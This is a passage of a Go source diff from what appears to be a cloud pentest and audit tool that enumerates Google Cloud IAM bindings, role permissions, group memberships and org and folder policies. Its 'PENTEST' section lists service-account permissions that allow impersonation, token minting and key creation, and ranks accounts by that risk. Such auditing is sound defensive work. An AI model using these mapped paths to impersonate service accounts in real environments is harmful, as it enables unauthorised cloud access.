pb.Members { + principalType := determinePrincipalType(member) + // Create a binding copy for this principal + principalBinding := PolicyBinding{ + Role: pb.Role, + Members: []string{member}, + ResourceID: pb.ResourceID, + ResourceType: pb.ResourceType, + Condition: pb.Condition, + PolicyName: pb.PolicyName, + IsInherited: pb.IsInherited, + InheritedFrom: pb.InheritedFrom, + } + + if principal, ok := principalMap[member]; ok { + principal.PolicyBindings = append(principal.PolicyBindings, principalBinding) + // Track custom roles + if isCustomRole(pb.Role) && !contains(principal.CustomRoles, pb.Role) { + principal.CustomRoles = append(principal.CustomRoles, pb.Role) + principal.HasCustomRoles = true + } + } else { + customRoles := []string{} + hasCustomRoles := false + if isCustomRole(pb.Role) { + customRoles = append(customRoles, pb.Role) + hasCustomRoles = true + } + principalMap[member] = &PrincipalWithRoles{ + Name: member, + Type: principalType, + Email: extractEmail(member), + PolicyBindings: []PolicyBinding{principalBinding}, + ResourceID: projectID, + ResourceType: "project", + HasCustomRoles: hasCustomRoles, + CustomRoles: customRoles, } } } @@ -187,3 +825,1162 @@ func (s *IAMService) PrincipalsWithRoles(resourceID string, resourceType string) return principals, nil } + +// GetMemberType returns the member type for display purposes +func GetMemberType(member string) string { + return determinePrincipalType(member) +} + +// GetRolesForServiceAccount returns all roles assigned to a service account in a project +// This includes both direct project-level bindings and inherited bindings from folders/org +func (s *IAMService) GetRolesForServiceAccount(projectID string, saEmail string) ([]string, error) { + // Get all bindings with inheritance + bindings, err := s.PoliciesWithInheritance(projectID) + if err != nil { + return nil, err + } + + // Find roles for this service account + saFullIdentifier := "serviceAccount:" + saEmail + rolesSet := make(map[string]bool) + + for _, binding := range bindings { + for _, member := range binding.Members { + if member == saFullIdentifier { + rolesSet[binding.Role] = true + } + } + } + + // Convert to slice + var roles []string + for role := range rolesSet { + roles = append(roles, role) + } + + return roles, nil +} + +// FormatRolesShort formats roles for compact table display +// Extracts just the role name from the full path and abbreviates common prefixes +func FormatRolesShort(roles []string) string { + if len(roles) == 0 { + return "-" + } + + var shortRoles []string + for _, role := range roles { + // Extract role name from full path + shortRole := role + + // Handle different role formats + if strings.HasPrefix(role, "roles/") { + shortRole = strings.TrimPrefix(role, "roles/") + } else if strings.Contains(role, "/roles/") { + // Custom role: projects/xxx/roles/MyRole or organizations/xxx/roles/MyRole + parts := strings.Split(role, "/roles/") + if len(parts) == 2 { + shortRole = parts[1] + " (custom)" + } + } + + shortRoles = append(shortRoles, shortRole) + } + + return strings.Join(shortRoles, ", ") +} + +// PermissionEntry represents a single permission with its source information +type PermissionEntry struct { + Permission string `json:"permission"` + Role string `json:"role"` + RoleType string `json:"roleType"` // "predefined", "custom", "basic" + ResourceID string `json:"resourceId"` + ResourceType string `json:"resourceType"` + IsInherited bool `json:"isInherited"` + InheritedFrom string `json:"inheritedFrom"` + HasCondition bool `json:"hasCondition"` + Condition string `json:"condition"` +} + +// EntityPermissions represents all permissions for an entity +type EntityPermissions struct { + Entity string `json:"entity"` + EntityType string `json:"entityType"` + Email string `json:"email"` + ProjectID string `json:"projectId"` + Permissions []PermissionEntry `json:"permissions"` + Roles []string `json:"roles"` + TotalPerms int `json:"totalPerms"` + UniquePerms int `json:"uniquePerms"` +} + +// RolePermissions caches role to permissions mapping +var rolePermissionsCache = make(map[string][]string) + +// rolePermissionsFailureCache tracks roles we've already failed to look up (to avoid duplicate error logs) +var rolePermissionsFailureCache = make(map[string]bool) + +// orgRoleAccessChecked tracks if we've already tried to access org-level custom roles +var orgRoleAccessChecked bool +var orgRoleAccessAvailable bool + +// GetRolePermissions retrieves the permissions for a given role +func (s *IAMService) GetRolePermissions(ctx context.Context, roleName string) ([]string, error) { + // Check cache first + if perms, ok := rolePermissionsCache[roleName]; ok { + return perms, nil + } + + // Check if we've already failed to look up this role + if rolePermissionsFailureCache[roleName] { + return nil, gcpinternal.ErrPermissionDenied + } + + iamService, err := s.getIAMService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + + var permissions []string + + // Handle different role types + if strings.HasPrefix(roleName, "roles/") { + // Predefined role + role, err := iamService.Roles.Get(roleName).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + permissions = role.IncludedPermissions + } else if strings.HasPrefix(roleName, "projects/") { + // Project-level custom role + role, err := iamService.Projects.Roles.Get(roleName).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + permissions = role.IncludedPermissions + } else if strings.HasPrefix(roleName, "organizations/") { + // Organization-level custom role + // Check if we already know org roles are inaccessible + if orgRoleAccessChecked && !orgRoleAccessAvailable { + rolePermissionsFailureCache[roleName] = true + return nil, gcpinternal.ErrPermissionDenied + } + + role, err := iamService.Organizations.Roles.Get(roleName).Context(ctx).Do() + if err != nil { + // Cache the failure to avoid repeated error logs + rolePermissionsFailureCache[roleName] = true + + // Check if this is a permission error - if so, mark org roles as inaccessible + parsedErr := gcpinternal.ParseGCPError(err, "iam.googleapis.com") + if gcpinternal.IsPermissionDenied(parsedErr) && !orgRoleAccessChecked { + orgRoleAccessChecked = true + orgRoleAccessAvailable = false + // Log once that org-level custom roles are not accessible + logger.InfoM("Organization-level custom roles not accessible - role permissions will not be expanded", globals.GCP_IAM_MODULE_NAME) + } + return nil, parsedErr + } + + // Mark org role access as available on first success + if !orgRoleAccessChecked { + orgRoleAccessChecked = true + orgRoleAccessAvailable = true + } + permissions = role.IncludedPermissions + } + + // Cache the result + rolePermissionsCache[roleName] = permissions + return permissions, nil +} + +// GetRoleType determines the type of role +func GetRoleType(roleName string) string { + switch { + case strings.HasPrefix(roleName, "roles/owner") || strings.HasPrefix(roleName, "roles/editor") || strings.HasPrefix(roleName, "roles/viewer"): + return "basic" + case strings.HasPrefix(roleName, "projects/") || strings.HasPrefix(roleName, "organizations/"): + return "custom" + default: + return "predefined" + } +} + +// GetEntityPermissions retrieves all permissions for a specific entity +func (s *IAMService) GetEntityPermissions(ctx context.Context, projectID string, entity string) (*EntityPermissions, error) { + // Get all bindings with inheritance + bindings, err := s.PoliciesWithInheritance(projectID) + if err != nil { + return nil, err + } + + entityPerms := &EntityPermissions{ + Entity: entity, + EntityType: determinePrincipalType(entity), + Email: extractEmail(entity), + ProjectID: projectID, + Permissions: []PermissionEntry{}, + Roles: []string{}, + } + + // Track unique permissions + uniquePerms := make(map[string]bool) + rolesSet := make(map[string]bool) + + // Process each binding + for _, binding := range bindings { + // Check if this entity is in the binding + found := false + for _, member := range binding.Members { + if member == entity { + found = true + break + } + } + if !found { + continue + } + + // Track the role + if !rolesSet[binding.Role] { + rolesSet[binding.Role] = true + entityPerms.Roles = append(entityPerms.Roles, binding.Role) + } + + // Get permissions for this role + permissions, err := s.GetRolePermissions(ctx, binding.Role) + if err != nil { + // Only log if this role wasn't already in the failure cache (to avoid duplicate messages) + // and if we haven't already determined org roles are inaccessible + isOrgRole := strings.HasPrefix(binding.Role, "organizations/") + if isOrgRole && orgRoleAccessChecked && !orgRoleAccessAvailable { + // Skip logging for org roles we know we can't access + continue + } + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, + fmt.Sprintf("Could not get permissions for role %s", binding.Role)) + continue + } + + // Create permission entries + for _, perm := range permissions { + permEntry := PermissionEntry{ + Permission: perm, + Role: binding.Role, + RoleType: GetRoleType(binding.Role), + ResourceID: binding.ResourceID, + ResourceType: binding.ResourceType, + IsInherited: binding.IsInherited, + InheritedFrom: binding.InheritedFrom, + HasCondition: binding.HasCondition, + } + if binding.ConditionInfo != nil { + permEntry.Condition = binding.ConditionInfo.Title + } + + entityPerms.Permissions = append(entityPerms.Permissions, permEntry) + + if !uniquePerms[perm] { + uniquePerms[perm] = true + } + } + } + + entityPerms.TotalPerms = len(entityPerms.Permissions) + entityPerms.UniquePerms = len(uniquePerms) + + return entityPerms, nil +} + +// GetAllEntityPermissions retrieves permissions for all entities in a project +func (s *IAMService) GetAllEntityPermissions(projectID string) ([]EntityPermissions, error) { + ctx := context.Background() + + // Get all principals + principals, err := s.PrincipalsWithRolesEnhanced(projectID) + if err != nil { + return nil, err + } + + var allPerms []EntityPermissions + + for _, principal := range principals { + entityPerms, err := s.GetEntityPermissions(ctx, projectID, principal.Name) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, + fmt.Sprintf("Could not get permissions for %s", principal.Name)) + continue + } + allPerms = append(allPerms, *entityPerms) + } + + return allPerms, nil +} + +// GetGroupMembership retrieves members of a Google Group using Cloud Identity API +// Requires cloudidentity.groups.readonly or cloudidentity.groups scope +func (s *IAMService) GetGroupMembership(ctx context.Context, groupEmail string) (*GroupInfo, error) { + ciService, err := s.getCloudIdentityService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudidentity.googleapis.com") + } + + groupInfo := &GroupInfo{ + Email: groupEmail, + Members: []GroupMember{}, + } + + // First, look up the group to get its resource name + // Cloud Identity uses groups/{group_id} format + lookupReq := ciService.Groups.Lookup() + lookupReq.GroupKeyId(groupEmail) + + lookupResp, err := lookupReq.Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudidentity.googleapis.com") + } + + groupName := lookupResp.Name + + // Get group details + group, err := ciService.Groups.Get(groupName).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudidentity.googleapis.com") + } + + groupInfo.DisplayName = group.DisplayName + groupInfo.Description = group.Description + + // List memberships + membershipsReq := ciService.Groups.Memberships.List(groupName) + err = membershipsReq.Pages(ctx, func(page *cloudidentity.ListMembershipsResponse) error { + for _, membership := range page.Memberships { + member := GroupMember{ + Role: membership.Roles[0].Name, // OWNER, MANAGER, MEMBER + } + + // Get member details from preferredMemberKey + if membership.PreferredMemberKey != nil { + member.Email = membership.PreferredMemberKey.Id + } + + // Determine member type + if membership.Type == "GROUP" { + member.Type = "GROUP" + groupInfo.NestedGroups = append(groupInfo.NestedGroups, member.Email) + groupInfo.HasNestedGroups = true + } else if strings.HasSuffix(member.Email, ".iam.gserviceaccount.com") { + member.Type = "SERVICE_ACCOUNT" + } else { + member.Type = "USER" + } + + groupInfo.Members = append(groupInfo.Members, member) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudidentity.googleapis.com") + } + + groupInfo.MemberCount = len(groupInfo.Members) + groupInfo.MembershipEnumerated = true + + return groupInfo, nil +} + +// cloudIdentityAPIChecked tracks whether we've already checked Cloud Identity API availability +var cloudIdentityAPIChecked bool +var cloudIdentityAPIAvailable bool + +// GetGroupMemberships retrieves members for all groups found in IAM bindings +func (s *IAMService) GetGroupMemberships(ctx context.Context, groups []GroupInfo) []GroupInfo { + var enrichedGroups []GroupInfo + + // Skip if we already know Cloud Identity API is not available + if cloudIdentityAPIChecked && !cloudIdentityAPIAvailable { + // Return groups as-is without attempting enumeration + for _, group := range groups { + group.MembershipEnumerated = false + enrichedGroups = append(enrichedGroups, group) + } + return enrichedGroups + } + + for i, group := range groups { + enrichedGroup, err := s.GetGroupMembership(ctx, group.Email) + if err != nil { + // Check if this is an API not enabled error + errStr := err.Error() + if strings.Contains(errStr, "API not enabled") || strings.Contains(errStr, "has not been used") || + strings.Contains(errStr, "cloudidentity.googleapis.com") { + // Mark API as unavailable to skip future attempts + if !cloudIdentityAPIChecked { + cloudIdentityAPIChecked = true + cloudIdentityAPIAvailable = false + logger.InfoM("Cloud Identity API not available - skipping group membership enumeration", globals.GCP_IAM_MODULE_NAME) + } + // Return remaining groups without attempting enumeration + for j := i; j < len(groups); j++ { + groups[j].MembershipEnumerated = false + enrichedGroups = append(enrichedGroups, groups[j]) + } + return enrichedGroups + } + + // Log other errors but continue trying other groups + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, + fmt.Sprintf("Could not enumerate membership for group %s", group.Email)) + // Keep the original group info without membership + group.MembershipEnumerated = false + enrichedGroups = append(enrichedGroups, group) + continue + } + + // Mark API as available on first success + if !cloudIdentityAPIChecked { + cloudIdentityAPIChecked = true + cloudIdentityAPIAvailable = true + } + + // Preserve the roles from the original group + enrichedGroup.Roles = group.Roles + enrichedGroup.ProjectID = group.ProjectID + enrichedGroups = append(enrichedGroups, *enrichedGroup) + } + + return enrichedGroups +} + +// ExpandGroupPermissions expands permissions to include inherited permissions from group membership +// This creates permission entries for group members based on the group's permissions +func (s *IAMService) ExpandGroupPermissions(ctx context.Context, projectID string, entityPerms []EntityPermissions) ([]EntityPermissions, error) { + // Find all groups in the entity permissions + groupPermsMap := make(map[string]*EntityPermissions) + for i := range entityPerms { + if entityPerms[i].EntityType == "Group" { + groupPermsMap[entityPerms[i].Entity] = &entityPerms[i] + } + } + + if len(groupPermsMap) == 0 { + return entityPerms, nil + } + + // Try to enumerate group memberships + var groupInfos []GroupInfo + for groupEmail := range groupPermsMap { + groupInfos = append(groupInfos, GroupInfo{Email: groupEmail, ProjectID: projectID}) + } + + enrichedGroups := s.GetGroupMemberships(ctx, groupInfos) + + // Create a map of member to their inherited permissions from groups + memberInheritedPerms := make(map[string][]PermissionEntry) + + for _, group := range enrichedGroups { + if !group.MembershipEnumerated { + continue + } + + groupPerms := groupPermsMap["group:"+group.Email] + if groupPerms == nil { + continue + } + + // For each member of the group, add the group's permissions as inherited + for _, member := range group.Members { + memberKey := "" + switch member.Type { + case "USER": + memberKey = "user:" + member.Email + case "SERVICE_ACCOUNT": + memberKey = "serviceAccount:" + member.Email + case "GROUP": + memberKey = "group:" + member.Email + } + + if memberKey == "" { + continue + } + + // Create inherited permission entries + for _, perm := range groupPerms.Permissions { + inheritedPerm := PermissionEntry{ + Permission: perm.Permission, + Role: perm.Role, + RoleType: perm.RoleType, + ResourceID: perm.ResourceID, + ResourceType: perm.ResourceType, + IsInherited: true, + InheritedFrom: fmt.Sprintf("group:%s", group.Email), + HasCondition: perm.HasCondition, + Condition: perm.Condition, + } + memberInheritedPerms[memberKey] = append(memberInheritedPerms[memberKey], inheritedPerm) + } + } + } + + // Add inherited permissions to existing entities or create new ones + entityMap := make(map[string]*EntityPermissions) + for i := range entityPerms { + entityMap[entityPerms[i].Entity] = &entityPerms[i] + } + + for memberKey, inheritedPerms := range memberInheritedPerms { + if existing, ok := entityMap[memberKey]; ok { + // Add inherited permissions to existing entity + existing.Permissions = append(existing.Permissions, inheritedPerms...) + existing.TotalPerms = len(existing.Permissions) + // Recalculate unique perms + uniquePerms := make(map[string]bool) + for _, p := range existing.Permissions { + uniquePerms[p.Permission] = true + } + existing.UniquePerms = len(uniquePerms) + } else { + // Create new entity entry for this group member + newEntity := EntityPermissions{ + Entity: memberKey, + EntityType: determinePrincipalType(memberKey), + Email: extractEmail(memberKey), + ProjectID: projectID, + Permissions: inheritedPerms, + Roles: []string{}, // Roles are inherited via group + TotalPerms: len(inheritedPerms), + } + // Calculate unique perms + uniquePerms := make(map[string]bool) + for _, p := range inheritedPerms { + uniquePerms[p.Permission] = true + } + newEntity.UniquePerms = len(uniquePerms) + entityPerms = append(entityPerms, newEntity) + } + } + + return entityPerms, nil +} + +// GetAllEntityPermissionsWithGroupExpansion retrieves permissions with group membership expansion +func (s *IAMService) GetAllEntityPermissionsWithGroupExpansion(projectID string) ([]EntityPermissions, []GroupInfo, error) { + ctx := context.Background() + + // Get base permissions + entityPerms, err := s.GetAllEntityPermissions(projectID) + if err != nil { + return nil, nil, err + } + + // Find groups + var groups []GroupInfo + for _, ep := range entityPerms { + if ep.EntityType == "Group" { + groups = append(groups, GroupInfo{ + Email: ep.Email, + ProjectID: projectID, + Roles: ep.Roles, + }) + } + } + + // Try to enumerate group memberships + enrichedGroups := s.GetGroupMemberships(ctx, groups) + + // Expand permissions based on group membership + expandedPerms, err := s.ExpandGroupPermissions(ctx, projectID, entityPerms) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, + "Could not expand group permissions") + return entityPerms, enrichedGroups, nil + } + + return expandedPerms, enrichedGroups, nil +} + +// ============================================================================ +// PENTEST: Service Account Impersonation Analysis +// ============================================================================ + +// Dangerous permissions for SA impersonation/abuse +var saImpersonationPermissions = map[string]string{ + "iam.serviceAccounts.getAccessToken": "tokenCreator", + "iam.serviceAccountKeys.create": "keyCreator", + "iam.serviceAccounts.signBlob": "signBlob", + "iam.serviceAccounts.signJwt": "signJwt", + "iam.serviceAccounts.implicitDelegation": "implicitDelegation", + "iam.serviceAccounts.actAs": "actAs", +} + +// GetServiceAccountIAMPolicy gets the IAM policy for a specific service account +func (s *IAMService) GetServiceAccountIAMPolicy(ctx context.Context, saEmail string, projectID string) (*SAImpersonationInfo, error) { + iamService, err := s.getIAMService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + + saResource := fmt.Sprintf("projects/%s/serviceAccounts/%s", projectID, saEmail) + + policy, err := iamService.Projects.ServiceAccounts.GetIamPolicy(saResource).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + + info := &SAImpersonationInfo{ + ServiceAccount: saEmail, + ProjectID: projectID, + RiskReasons: []string{}, + } + + // Analyze each binding + for _, binding := range policy.Bindings { + role := binding.Role + members := binding.Members + + // Check for specific dangerous roles + switch role { + case "roles/iam.serviceAccountTokenCreator": + info.TokenCreators = append(info.TokenCreators, members...) + case "roles/iam.serviceAccountKeyAdmin": + info.KeyCreators = append(info.KeyCreators, members...) + info.SAAdmins = append(info.SAAdmins, members...) + case "roles/iam.serviceAccountAdmin": + info.SAAdmins = append(info.SAAdmins, members...) + info.TokenCreators = append(info.TokenCreators, members...) + info.KeyCreators = append(info.KeyCreators, members...) + case "roles/iam.serviceAccountUser": + info.ActAsUsers = append(info.ActAsUsers, members...) + case "roles/owner", "roles/editor": + // These grant broad SA access + info.SAAdmins = append(info.SAAdmins, members...) + } + } + + // Calculate risk level + info.RiskLevel, info.RiskReasons = calculateSAImpersonationRisk(info) + + return info, nil +} + +// GetAllServiceAccountImpersonation analyzes impersonation risks for all SAs in a project +func (s *IAMService) GetAllServiceAccountImpersonation(projectID string) ([]SAImpersonationInfo, error) { + ctx := context.Background() + + // Get all service accounts (without keys - impersonation analysis doesn't need them) + serviceAccounts, err := s.ServiceAccountsBasic(projectID) + if err != nil { + return nil, err + } + + var results []SAImpersonationInfo + + for _, sa := range serviceAccounts { + info, err := s.GetServiceAccountIAMPolicy(ctx, sa.Email, projectID) + if err != nil { + // Log but don't fail - we might not have permission + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, + fmt.Sprintf("Could not get IAM policy for SA %s", sa.Email)) + continue + } + results = append(results, *info) + } + + return results, nil +} + +// ServiceAccountsWithImpersonation returns service accounts with impersonation analysis +func (s *IAMService) ServiceAccountsWithImpersonation(projectID string) ([]ServiceAccountInfo, error) { + ctx := context.Background() + + // Get base service account info (without keys - impersonation analysis doesn't need them) + serviceAccounts, err := s.ServiceAccountsBasic(projectID) + if err != nil { + return nil, err + } + + // Enrich with impersonation info + for i := range serviceAccounts { + sa := &serviceAccounts[i] + + info, err := s.GetServiceAccountIAMPolicy(ctx, sa.Email, projectID) + if err != nil { + // Log but continue + continue + } + + // Populate impersonation fields + sa.CanGetAccessTokenBy = info.TokenCreators + sa.CanCreateKeysBy = info.KeyCreators + sa.CanSignBlobBy = info.SignBlobUsers + sa.CanSignJwtBy = info.SignJwtUsers + + // Combine all impersonation paths + allImpersonators := make(map[string]bool) + for _, m := range info.TokenCreators { + allImpersonators[m] = true + } + for _, m := range info.KeyCreators { + allImpersonators[m] = true + } + for _, m := range info.SignBlobUsers { + allImpersonators[m] = true + } + for _, m := range info.SignJwtUsers { + allImpersonators[m] = true + } + for _, m := range info.SAAdmins { + allImpersonators[m] = true + } + + for m := range allImpersonators { + sa.CanBeImpersonatedBy = append(sa.CanBeImpersonatedBy, m) + } + + sa.HasImpersonationRisk = len(sa.CanBeImpersonatedBy) > 0 + sa.ImpersonationRiskLevel = info.RiskLevel + } + + return serviceAccounts, nil +} + +func calculateSAImpersonationRisk(info *SAImpersonationInfo) (string, []string) { + var reasons []string + score := 0 + + // Token creators are critical - direct impersonation + if len(info.TokenCreators) > 0 { + reasons = append(reasons, fmt.Sprintf("%d principal(s) can get access tokens (impersonate)", len(info.TokenCreators))) + score += 3 + + // Check for public access + for _, m := range info.TokenCreators { + if m == "allUsers" || m == "allAuthenticatedUsers" { + reasons = append(reasons, "PUBLIC can impersonate this SA!") + score += 5 + } + } + } + + // Key creators are critical - persistent access + if len(info.KeyCreators) > 0 { + reasons = append(reasons, fmt.Sprintf("%d principal(s) can create keys (persistent access)", len(info.KeyCreators))) + score += 3 + + for _, m := range info.KeyCreators { + if m == "allUsers" || m == "allAuthenticatedUsers" { + reasons = append(reasons, "PUBLIC can create keys for this SA!") + score += 5 + } + } + } + + // SignBlob/SignJwt - can forge tokens + if len(info.SignBlobUsers) > 0 || len(info.SignJwtUsers) > 0 { + reasons = append(reasons, "Principals can sign blobs/JWTs (token forgery)") + score += 2 + } + + // SA Admins + if len(info.SAAdmins) > 0 { + reasons = append(reasons, fmt.Sprintf("%d SA admin(s)", len(info.SAAdmins))) + score += 1 + } + + // ActAs users (needed for attaching SA to resources) + if len(info.ActAsUsers) > 0 { + reasons = append(reasons, fmt.Sprintf("%d principal(s) can actAs this SA", len(info.ActAsUsers))) + score += 1 + } + + if score >= 5 { + return "CRITICAL", reasons + } else if score >= 3 { + return "HIGH", reasons + } else if score >= 2 { + return "MEDIUM", reasons + } else if score >= 1 { + return "LOW", reasons + } + return "INFO", reasons +} + +// ============================================================================ +// Organization and Folder IAM Enumeration +// ============================================================================ + +// ScopeBinding represents an IAM binding with full scope information +type ScopeBinding struct { + ScopeType string `json:"scopeType"` // organization, folder, project + ScopeID string `json:"scopeId"` // The ID of the scope + ScopeName string `json:"scopeName"` // Display name of the scope + Member string `json:"member"` // Full member identifier + MemberType string `json:"memberType"` // User, ServiceAccount, Group, etc. + MemberEmail string `json:"memberEmail"` // Clean email + Role string `json:"role"` + IsCustom bool `json:"isCustom"` + HasCondition bool `json:"hasCondition"` + ConditionInfo *IAMCondition `json:"conditionInfo"` +} + +// OrgFolderIAMData holds IAM bindings from organizations and folders +type OrgFolderIAMData struct { + Organizations []ScopeBinding `json:"organizations"` + Folders []ScopeBinding `json:"folders"` + OrgNames map[string]string `json:"orgNames"` // orgID -> displayName + FolderNames map[string]string `json:"folderNames"` // folderID -> displayName +} + +// GetOrganizationIAM gets IAM bindings for all accessible organizations +func (s *IAMService) GetOrganizationIAM(ctx context.Context) ([]ScopeBinding, map[string]string, error) { + var bindings []ScopeBinding + orgNames := make(map[string]string) + + // First, search for accessible organizations + var orgsClient *resourcemanager.OrganizationsClient + var err error + if s.session != nil { + orgsClient, err = resourcemanager.NewOrganizationsClient(ctx, s.session.GetClientOption()) + } else { + orgsClient, err = resourcemanager.NewOrganizationsClient(ctx) + } + if err != nil { + return nil, orgNames, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + defer orgsClient.Close() + + // Search for organizations + searchReq := &resourcemanagerpb.SearchOrganizationsRequest{} + it := orgsClient.SearchOrganizations(ctx, searchReq) + for { + org, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + // Log the error - likely permission denied for organization search + parsedErr := gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + gcpinternal.HandleGCPError(parsedErr, logger, globals.GCP_IAM_MODULE_NAME, "Could not search organizations") + break + } + + orgID := strings.TrimPrefix(org.Name, "organizations/") + orgNames[orgID] = org.DisplayName + + // Get IAM policy for this organization + policy, err := orgsClient.GetIamPolicy(ctx, &iampb.GetIamPolicyRequest{ + Resource: org.Name, + }) + if err != nil { + continue + } + + // Convert policy to scope bindings + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + sb := ScopeBinding{ + ScopeType: "organization", + ScopeID: orgID, + ScopeName: org.DisplayName, + Member: member, + MemberType: determinePrincipalType(member), + MemberEmail: extractEmail(member), + Role: binding.Role, + IsCustom: isCustomRole(binding.Role), + } + if binding.Condition != nil { + sb.HasCondition = true + sb.ConditionInfo = &IAMCondition{ + Title: binding.Condition.Title, + Description: binding.Condition.Description, + Expression: binding.Condition.Expression, + } + } + bindings = append(bindings, sb) + } + } + } + + return bindings, orgNames, nil +} + +// GetFolderIAM gets IAM bindings for all accessible folders +func (s *IAMService) GetFolderIAM(ctx context.Context) ([]ScopeBinding, map[string]string, error) { + var bindings []ScopeBinding + folderNames := make(map[string]string) + + var foldersClient *resourcemanager.FoldersClient + var err error + if s.session != nil { + foldersClient, err = resourcemanager.NewFoldersClient(ctx, s.session.GetClientOption()) + } else { + foldersClient, err = resourcemanager.NewFoldersClient(ctx) + } + if err != nil { + return nil, folderNames, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + defer foldersClient.Close() + + // Search for all folders + searchReq := &resourcemanagerpb.SearchFoldersRequest{} + it := foldersClient.SearchFolders(ctx, searchReq) + for { + folder, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + // Log the error - likely permission denied for folder search + parsedErr := gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + gcpinternal.HandleGCPError(parsedErr, logger, globals.GCP_IAM_MODULE_NAME, "Could not search folders") + break + } + + folderID := strings.TrimPrefix(folder.Name, "folders/") + folderNames[folderID] = folder.DisplayName + + // Get IAM policy for this folder + policy, err := foldersClient.GetIamPolicy(ctx, &iampb.GetIamPolicyRequest{ + Resource: folder.Name, + }) + if err != nil { + continue + } + + // Convert policy to scope bindings + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + sb := ScopeBinding{ + ScopeType: "folder", + ScopeID: folderID, + ScopeName: folder.DisplayName, + Member: member, + MemberType: determinePrincipalType(member), + MemberEmail: extractEmail(member), + Role: binding.Role, + IsCustom: isCustomRole(binding.Role), + } + if binding.Condition != nil { + sb.HasCondition = true + sb.ConditionInfo = &IAMCondition{ + Title: binding.Condition.Title, + Description: binding.Condition.Description, + Expression: binding.Condition.Expression, + } + } + bindings = append(bindings, sb) + } + } + } + + return bindings, folderNames, nil +} + +// GetAllScopeIAM gets IAM bindings from organizations, folders, and projects +func (s *IAMService) GetAllScopeIAM(ctx context.Context, projectIDs []string, projectNames map[string]string) ([]ScopeBinding, error) { + var allBindings []ScopeBinding + + // Get organization IAM + orgBindings, _, err := s.GetOrganizationIAM(ctx) + if err != nil { + // Log but continue - we might not have org access + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, "Could not enumerate organization IAM") + } else { + allBindings = append(allBindings, orgBindings...) + } + + // Get folder IAM + folderBindings, _, err := s.GetFolderIAM(ctx) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, "Could not enumerate folder IAM") + } else { + allBindings = append(allBindings, folderBindings...) + } + + // Get project IAM for each project + for _, projectID := range projectIDs { + projectBindings, err := s.Policies(projectID, "project") + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, + fmt.Sprintf("Could not enumerate IAM for project %s", projectID)) + continue + } + + projectName := projectID + if name, ok := projectNames[projectID]; ok { + projectName = name + } + + for _, pb := range projectBindings { + for _, member := range pb.Members { + sb := ScopeBinding{ + ScopeType: "project", + ScopeID: projectID, + ScopeName: projectName, + Member: member, + MemberType: determinePrincipalType(member), + MemberEmail: extractEmail(member), + Role: pb.Role, + IsCustom: isCustomRole(pb.Role), + } + if pb.HasCondition && pb.ConditionInfo != nil { + sb.HasCondition = true + sb.ConditionInfo = pb.ConditionInfo + } + allBindings = append(allBindings, sb) + } + } + } + + return allBindings, nil +} + +// ============================================================================ +// MFA Status Lookup via Cloud Identity API +// ============================================================================ + +// MFAStatus represents the MFA status for a user +type MFAStatus struct { + Email string `json:"email"` + HasMFA bool `json:"hasMfa"` + MFAType string `json:"mfaType"` // 2SV method type + Enrolled bool `json:"enrolled"` // Whether 2SV is enrolled + Enforced bool `json:"enforced"` // Whether 2SV is enforced by policy + LastUpdate string `json:"lastUpdate"` + Error string `json:"error"` // Error message if lookup failed +} + +// GetUserMFAStatus attempts to get MFA status for a user via Cloud Identity API +// This requires cloudidentity.users.get or admin.directory.users.get permission +func (s *IAMService) GetUserMFAStatus(ctx context.Context, email string) (*MFAStatus, error) { + status := &MFAStatus{ + Email: email, + } + + // Cloud Identity doesn't directly expose 2SV status + // We need to use the Admin SDK Directory API which requires admin privileges + // For now, we'll attempt to look up the user and note if we can't + + ciService, err := s.getCloudIdentityService(ctx) + if err != nil { + status.Error = "Cloud Identity API not accessible" + return status, nil + } + + // Try to look up the user - this gives us some info but not 2SV status directly + // The Admin SDK would be needed for full 2SV info + lookupReq := ciService.Groups.Lookup() + // We can't directly query user 2SV via Cloud Identity + // This would require Admin SDK with admin.directory.users.get + _ = lookupReq + + status.Error = "2SV status requires Admin SDK access" + return status, nil +} + +// GetBulkMFAStatus attempts to get MFA status for multiple users +// Returns a map of email -> MFAStatus +func (s *IAMService) GetBulkMFAStatus(ctx context.Context, emails []string) map[string]*MFAStatus { + results := make(map[string]*MFAStatus) + + for _, email := range emails { + // Skip non-user emails (service accounts, groups, etc.) + if strings.HasSuffix(email, ".iam.gserviceaccount.com") { + results[email] = &MFAStatus{ + Email: email, + Error: "N/A (service account)", + } + continue + } + if strings.Contains(email, "group") || !strings.Contains(email, "@") { + results[email] = &MFAStatus{ + Email: email, + Error: "N/A", + } + continue + } + + status, _ := s.GetUserMFAStatus(ctx, email) + results[email] = status + } + + return results +} + +// ============================================================================ +// Enhanced Combined IAM with All Scopes +// ============================================================================ + +// EnhancedIAMData holds comprehensive IAM data including org/folder bindings +type 